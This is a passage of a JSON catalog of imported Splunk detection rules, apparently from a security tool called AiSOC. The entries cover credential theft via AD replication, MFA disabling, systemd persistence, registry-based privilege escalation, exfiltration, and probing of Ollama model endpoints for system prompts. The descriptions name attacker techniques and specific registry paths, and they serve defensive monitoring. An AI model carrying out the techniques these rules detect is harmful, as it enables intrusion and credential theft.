If confirmed malicious, this could allow attackers to exfiltrate sensitive credentials, leading to unauthorized access and potential domain-wide compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.006", "T1207" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-replication-service-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c6e24183-a5f4-4b2a-ad01-2eb456d09b67", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/windows_ad_replication_service_traffic.yml" } }, { "id": "splunk-security-content-c7495048-61b6-11ec-9a37-acde48001122", "type": "detection", "name": "Linux Service File Created In Systemd Directory", "description": "The following analytic detects the creation of suspicious service files within the systemd directories on Linux platforms. It leverages logs containing file name, file path, and process GUID data from endpoints. This activity is significant for a SOC as it may indicate an adversary attempting to establish persistence on a compromised host. 
If confirmed malicious, this could lead to system compromise or data exfiltration, allowing attackers to maintain control over the system and execute further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-service-file-created-in-systemd-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c7495048-61b6-11ec-9a37-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_service_file_created_in_systemd_directory.yml" } }, { "id": "splunk-security-content-c76b796c-27e1-4520-91c4-4a58695c749e", "type": "detection", "name": "Windows Files and Dirs Access Rights Modification Via Icacls", "description": "The following analytic identifies the modification of security permissions\non files or directories using tools like icacls.exe, cacls.exe, or xcacls.exe. It\nleverages data from Endpoint Detection and Response (EDR) agents, focusing on specific\ncommand-line executions. This activity is significant as it is commonly used by\nAdvanced Persistent Threats (APTs) and coinminer scripts to evade detection and\nmaintain control over compromised systems. 
If confirmed malicious, this behavior\ncould allow attackers to hinder investigation, impede remediation efforts, and maintain\npersistent access to the compromised environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-files-and-dirs-access-rights-modification-via-icacls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c76b796c-27e1-4520-91c4-4a58695c749e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_files_and_dirs_access_rights_modification_via_icacls.yml" } }, { "id": "splunk-security-content-c77162d3-f93c-45cc-80c8-22f6a4264e7f", "type": "detection", "name": "Unusually Long Command Line", "description": "The following analytic detects unusually long command lines, which may indicate malicious activity. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on the length of command lines executed on hosts. This behavior is significant because attackers often use obfuscated or complex command lines to evade detection and execute malicious payloads. If confirmed malicious, this activity could lead to data theft, ransomware deployment, or further system compromise. 
Analysts should investigate the source and content of the command line, inspect relevant artifacts, and review concurrent processes to identify potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/unusually-long-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c77162d3-f93c-45cc-80c8-22f6a4264e7f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/unusually_long_command_line.yml" } }, { "id": "splunk-security-content-c783dd98-c703-4252-9e8a-f19d9f5c949e", "type": "detection", "name": "O365 Disable MFA", "description": "The following analytic identifies instances where Multi-Factor Authentication (MFA) is disabled for a user within the Office 365 environment. It leverages O365 audit logs, specifically focusing on events related to MFA settings. Disabling MFA removes a critical security layer, making accounts more vulnerable to unauthorized access. If confirmed malicious, this activity could indicate an attacker attempting to maintain persistence or an insider threat, significantly increasing the risk of unauthorized access. 
Immediate investigation is required to validate the reason for disabling MFA, potentially re-enable it, and assess any other suspicious activities related to the affected account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-disable-mfa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c783dd98-c703-4252-9e8a-f19d9f5c949e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_disable_mfa.yml" } }, { "id": "splunk-security-content-c783dd98-c703-4252-9e8a-f19d9f66949e", "type": "detection", "name": "O365 Bypass MFA via Trusted IP", "description": "The following analytic identifies instances where new IP addresses are added to the trusted IPs list in Office 365, potentially allowing users from these IPs to bypass Multi-Factor Authentication (MFA) during login. It leverages O365 audit logs, specifically focusing on events related to the modification of trusted IP settings. This activity is significant because adding trusted IPs can weaken the security posture by bypassing MFA, which is a critical security control. If confirmed malicious, this could lead to unauthorized access, compromising sensitive information and systems. 
Immediate investigation is required to validate the legitimacy of the IP addition.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-bypass-mfa-via-trusted-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c783dd98-c703-4252-9e8a-f19d9f66949e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_bypass_mfa_via_trusted_ip.yml" } }, { "id": "splunk-security-content-c79c164f-4b21-4847-98f9-cf6a9f49179e", "type": "detection", "name": "AWS Detect Users creating keys with encrypt policy without MFA", "description": "The following analytic detects the creation of AWS KMS keys with an encryption policy accessible to everyone, including external entities. It leverages AWS CloudTrail logs to identify `CreateKey` or `PutKeyPolicy` events where the `kms:Encrypt` action is granted to all principals. This activity is significant as it may indicate a compromised account, allowing an attacker to misuse the encryption key to target other organizations. 
If confirmed malicious, this could lead to unauthorized data encryption, potentially disrupting operations and compromising sensitive information across multiple entities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-detect-users-creating-keys-with-encrypt-policy-without-mfa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c79c164f-4b21-4847-98f9-cf6a9f49179e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_detect_users_creating_keys_with_encrypt_policy_without_mfa.yml" } }, { "id": "splunk-security-content-c7fe0949-348a-41ce-8f17-a09a7fe5fd7d", "type": "detection", "name": "O365 Email Hard Delete Excessive Volume", "description": "The following analytic identifies when an O365 email account hard deletes an excessive number of emails within a short period (within 1 hour). This behavior may indicate a compromised account where the threat actor is attempting to permanently purge a large amount of items from the mailbox. Threat actors may attempt to remove evidence of their activity by purging items from the compromised mailbox. 
--- Some account owner legitimate behaviors can trigger this alert, however these actions may not be aligned with organizational expectations / best practice behaviors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.008", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-hard-delete-excessive-volume.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c7fe0949-348a-41ce-8f17-a09a7fe5fd7d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_hard_delete_excessive_volume.yml" } }, { "id": "splunk-security-content-c8119b2f-d7f7-40be-940a-1c582870e8e2", "type": "detection", "name": "Kubernetes Previously Unseen Process", "description": "The following analytic detects previously unseen processes within the Kubernetes environment on master or worker nodes. It leverages process metrics collected via an OTEL collector and hostmetrics receiver, and data is pulled from Splunk Observability Cloud. This detection compares processes observed in the last hour against those seen in the previous 30 days. Identifying new processes is crucial as they may indicate unauthorized activity or attempts to compromise the node. 
If confirmed malicious, these processes could lead to data exfiltration, privilege escalation, denial-of-service attacks, or the introduction of malware, posing significant risks to the Kubernetes cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-previously-unseen-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c8119b2f-d7f7-40be-940a-1c582870e8e2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_previously_unseen_process.yml" } }, { "id": "splunk-security-content-c8127f87-c7c9-4036-89ed-8fe4b30e678c", "type": "detection", "name": "Windows Remote Service Rdpwinst Tool Execution", "description": "The following analytic detects the execution of the RDPWInst.exe tool, which is an RDP wrapper library used to enable remote desktop host support and concurrent RDP sessions. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, original file names, and specific command-line arguments. This activity is significant because adversaries can abuse this tool to establish unauthorized RDP connections, facilitating remote access and potential lateral movement within the network. 
If confirmed malicious, this could lead to unauthorized access, data exfiltration, and further compromise of the targeted host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-service-rdpwinst-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c8127f87-c7c9-4036-89ed-8fe4b30e678c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_service_rdpwinst_tool_execution.yml" } }, { "id": "splunk-security-content-c82adbc6-9f00-11ec-a81f-acde48001122", "type": "detection", "name": "Windows Disable Lock Workstation Feature Through Registry", "description": "The following analytic detects a suspicious registry modification that disables the Lock Computer feature in Windows. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation\" with a value of \"0x00000001\". This activity is significant because it prevents users from locking their screens, a tactic often used by malware, including ransomware, to maintain control over compromised systems. 
If confirmed malicious, this could allow attackers to sustain their presence and execute further malicious actions without user interruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-lock-workstation-feature-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c82adbc6-9f00-11ec-a81f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_lock_workstation_feature_through_registry.yml" } }, { "id": "splunk-security-content-c8640777-469f-4638-ab44-c34a3233ffac", "type": "detection", "name": "Windows Get-AdComputer Unconstrained Delegation Discovery", "description": "The following analytic detects the use of the Get-ADComputer cmdlet with parameters indicating a search for Windows endpoints with Kerberos Unconstrained Delegation. It leverages PowerShell Script Block Logging (EventCode=4104) to identify this specific activity. This behavior is significant as it may indicate an attempt by adversaries or Red Teams to gain situational awareness and perform Active Directory discovery. 
If confirmed malicious, this activity could allow attackers to identify high-value targets for further exploitation, potentially leading to privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-get-adcomputer-unconstrained-delegation-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c8640777-469f-4638-ab44-c34a3233ffac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_get_adcomputer_unconstrained_delegation_discovery.yml" } }, { "id": "splunk-security-content-c8a6b56d-16dd-4e9c-b4bd-527742ead98d", "type": "detection", "name": "High Volume of Bytes Out to Url", "description": "The following analytic detects a high volume of outbound web traffic, specifically over 1GB of data sent to a URL within a 2-minute window. It leverages the Web data model to identify significant uploads by analyzing the sum of bytes out. This activity is significant as it may indicate potential data exfiltration by malware or malicious insiders. If confirmed as malicious, this behavior could lead to unauthorized data transfer, resulting in data breaches and loss of sensitive information. 
Immediate investigation is required to determine the legitimacy of the transfer and mitigate any potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/high-volume-of-bytes-out-to-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c8a6b56d-16dd-4e9c-b4bd-527742ead98d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/high_volume_of_bytes_out_to_url.yml" } }, { "id": "splunk-security-content-c8bff7a4-11ea-4416-a27d-c5bca472913d", "type": "detection", "name": "Detect malicious requests to exploit JBoss servers", "description": "The following analytic identifies malicious HTTP requests targeting the jmx-console in JBoss servers. It detects unusually long URLs, indicative of embedded payloads, by analyzing web server logs for GET or HEAD requests with specific URL patterns and lengths. This activity is significant as it may indicate an attempt to exploit JBoss vulnerabilities, potentially leading to unauthorized remote code execution. 
If confirmed malicious, attackers could gain control over the server, escalate privileges, and compromise sensitive data, posing a severe threat to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-malicious-requests-to-exploit-jboss-servers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c8bff7a4-11ea-4416-a27d-c5bca472913d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/detect_malicious_requests_to_exploit_jboss_servers.yml" } }, { "id": "splunk-security-content-c8c987d6-3a1a-4555-9a52-eea0741b6113", "type": "detection", "name": "HTTP Rapid POST with Mixed Status Codes", "description": "This detection identifies rapid-fire POST request attacks where an attacker sends more than 20 POST requests within a 5-second window, potentially attempting to exploit race conditions or overwhelm request handling. 
The pattern is particularly suspicious when responses vary in size or status codes, indicating successful exploitation attempts or probing for vulnerable endpoints.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1190", "T1595" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-rapid-post-with-mixed-status-codes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c8c987d6-3a1a-4555-9a52-eea0741b6113", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/http_rapid_post_with_mixed_status_codes.yml" } }, { "id": "splunk-security-content-c8e7ced0-10c5-11ec-8b03-acde48001122", "type": "detection", "name": "Rundll32 Control RunDLL Hunt", "description": "The following analytic identifies instances of rundll32.exe executing with `Control_RunDLL` in the command line, which is indicative of loading a .cpl or other file types. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant as rundll32.exe can be exploited to execute malicious Control Panel Item files, potentially linked to CVE-2021-40444. 
If confirmed malicious, this could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-control-rundll-hunt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c8e7ced0-10c5-11ec-8b03-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll32_control_rundll_hunt.yml" } }, { "id": "splunk-security-content-c91a0852-9fbb-11ec-af44-acde48001122", "type": "detection", "name": "Unknown Process Using The Kerberos Protocol", "description": "The following analytic identifies a non-lsass.exe process making an outbound connection on port 88, which is typically used by the Kerberos authentication protocol. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and network traffic logs. This activity is significant because, under normal circumstances, only the lsass.exe process should interact with the Kerberos Distribution Center. 
If confirmed malicious, this behavior could indicate an adversary attempting to abuse the Kerberos protocol, potentially leading to unauthorized access or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1550" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/unknown-process-using-the-kerberos-protocol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c91a0852-9fbb-11ec-af44-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/unknown_process_using_the_kerberos_protocol.yml" } }, { "id": "splunk-security-content-c9687a28-39ad-43c6-8bcf-eaf061ba0cbe", "type": "detection", "name": "Windows Privilege Escalation User Process Spawn System Process", "description": "The following analytic detects when a process with low, medium, or high integrity spawns a system integrity process from a user-controlled location.\nThis behavior is indicative of privilege escalation attempts where attackers elevate their privileges to SYSTEM level from a user-controlled process or service.\nThe detection leverages Sysmon data, specifically Event ID 15, to identify such transitions.\nMonitoring this activity is crucial as it can signify an attacker gaining SYSTEM-level access, potentially leading to full control over the affected system, unauthorized access to sensitive data, and further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [ "T1068", "T1548", "T1134" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-privilege-escalation-user-process-spawn-system-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c9687a28-39ad-43c6-8bcf-eaf061ba0cbe", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_privilege_escalation_user_process_spawn_system_process.yml" } }, { "id": "splunk-security-content-c97b3d72-0a47-46f9-b742-b89f1cc2d551", "type": "detection", "name": "O365 Email Send and Hard Delete Suspicious Behavior", "description": "The following analytic identifies when an O365 email account sends and then hard deletes email within a short period (within 1 hour). This behavior may indicate a compromised account where the threat actor is attempting to remove forensic artifacts or evidence of activity. Threat actors often use this technique to prevent defenders and victims from knowing the account has been compromised. 
--- Some account owner legitimate behaviors can trigger this alert, however these actions may not be aligned with organizational expectations / best practice behaviors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.001", "T1070.008", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-send-and-hard-delete-suspicious-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c97b3d72-0a47-46f9-b742-b89f1cc2d551", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_send_and_hard_delete_suspicious_behavior.yml" } }, { "id": "splunk-security-content-c9ef7dc4-eeaf-11eb-b2b6-acde48001122", "type": "detection", "name": "Regsvr32 with Known Silent Switch Cmdline", "description": "The following analytic detects the execution of Regsvr32.exe with the silent switch to load DLLs. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on command-line executions containing the `-s` or `/s` switches. This activity is significant as it is commonly used in malware campaigns, such as IcedID, to stealthily load malicious DLLs. If confirmed malicious, this could allow an attacker to execute arbitrary code, download additional payloads, and potentially compromise the system further. 
Immediate investigation and endpoint isolation are recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/regsvr32-with-known-silent-switch-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c9ef7dc4-eeaf-11eb-b2b6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/regsvr32_with_known_silent_switch_cmdline.yml" } }, { "id": "splunk-security-content-c9f010da-57ab-11ec-82bd-acde48001122", "type": "detection", "name": "Windows Raccine Scheduled Task Deletion", "description": "The following analytic identifies the deletion of the Raccine Rules Updater scheduled task using the `schtasks.exe` command. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because adversaries may delete this task to disable Raccine, a tool designed to prevent ransomware attacks. 
If confirmed malicious, this action could allow ransomware to execute without interference, leading to potential data encryption and loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-raccine-scheduled-task-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c9f010da-57ab-11ec-82bd-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_raccine_scheduled_task_deletion.yml" } }, { "id": "splunk-security-content-c9f4b923-f8af-4155-b697-1354f5bcbc5e", "type": "detection", "name": "Registry Keys Used For Privilege Escalation", "description": "The following analytic detects modifications to registry keys under \"Image File Execution Options\" that can be used for privilege escalation. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to registry paths and values like GlobalFlag and Debugger. This activity is significant because attackers can use these modifications to intercept executable calls and attach malicious binaries to legitimate system binaries. 
If confirmed malicious, this could allow attackers to execute arbitrary code with elevated privileges, leading to potential system compromise and persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/registry-keys-used-for-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c9f4b923-f8af-4155-b697-1354f5bcbc5e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/registry_keys_used_for_privilege_escalation.yml" } }, { "id": "splunk-security-content-c9fd1a54-0eab-4470-8970-d5fcc3c740fb", "type": "detection", "name": "Ollama Possible Model Exfiltration Data Leakage", "description": "Detects data leakage and exfiltration attempts targeting Ollama model metadata and configuration endpoints. Adversaries repeatedly query /api/show, /api/tags, and /api/v1/models to systematically extract sensitive model information including architecture details, fine-tuning parameters, system paths, Modelfile configurations, and proprietary customizations. Multiple inspection attempts within a 15-minute window indicate automated exfiltration of valuable intellectual property such as custom model configurations, system prompts, and internal model specifications. 
This activity represents unauthorized data disclosure that could enable competitive intelligence gathering, model replication, or preparation for advanced attacks against the AI infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ollama-possible-model-exfiltration-data-leakage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c9fd1a54-0eab-4470-8970-d5fcc3c740fb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ollama_possible_model_exfiltration_data_leakage.yml" } }, { "id": "splunk-security-content-ca4e94fb-7969-4d63-8630-3625809a1f70", "type": "detection", "name": "Windows Modify Registry UpdateServiceUrlAlternate", "description": "The following analytic detects a suspicious modification to the Windows Update configuration registry key, specifically targeting the UpdateServiceUrlAlternate setting. It leverages data from the Endpoint.Registry datamodel to identify changes to this registry path. This activity is significant because adversaries, including malware like RedLine Stealer, exploit this technique to bypass detection and deploy additional payloads. 
